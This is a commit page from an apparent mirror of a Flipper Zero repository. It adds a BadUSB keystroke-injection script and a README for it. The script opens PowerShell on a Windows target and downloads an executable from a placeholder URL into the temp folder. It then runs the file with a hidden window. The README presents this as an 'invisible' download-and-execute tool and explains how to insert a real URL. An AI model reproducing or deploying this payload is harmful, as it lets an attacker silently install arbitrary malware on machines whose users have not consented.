mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2026-09-18 16:31:30 +00:00
Adding lost UNC0V3R3D BadUSB Collection
This commit is contained in:
+17
@@ -0,0 +1,17 @@
|
||||
REM Author: hell0
|
||||
REM Description: Downloads an .exe file from the URL and runs it on the target pc.
|
||||
REM Version: 1.0
|
||||
REM Category: Execution
|
||||
REM Target: All Windows
|
||||
DELAY 500
|
||||
GUI d
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell.exe
|
||||
ENTER
|
||||
DELAY 2000
|
||||
STRING Start-Process -FilePath "powershell" -ArgumentList "/c cd $Env:temp;Invoke-WebRequest -Uri 'https://yoursite.com/your_executable.exe' -OutFile 'your_executable.exe'; Start-Process -FilePath '.\your_executable.exe'; exit" -WindowStyle Hidden; exit
|
||||
ENTER
|
||||
DELAY 500
|
||||
GUI d
|
||||
+45
@@ -0,0 +1,45 @@
|
||||
|
||||
# Invisible_DownExec
|
||||
|
||||
This script invisibly downloads an exe from an url that you will have to provide, then it executes the exe file.
|
||||
|
||||
|
||||
|
||||
## How to use?
|
||||
|
||||
This script is not plug and play. You will have to do the following changes:
|
||||
|
||||
- change url for the .exe file "-Uri 'https://yoursite.com/your_executable.exe'"
|
||||
- change name of the .exe file "-OutFile 'your_executable.exe'"
|
||||
|
||||
|
||||
## Features
|
||||
|
||||
- open powershell invisble
|
||||
- download .exe from url
|
||||
- execute downloaded .exe
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## Feedback
|
||||
|
||||
If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## Support
|
||||
|
||||
For support, contact me via Discord "UNC0V3R3D#8662".
|
||||
|
||||
|
||||
## Meta
|
||||
|
||||
|
||||
- If you want to sponsor me on Patreon, the link is on my profile.
|
||||
|
||||
|
||||
Reference in New Issue
Block a user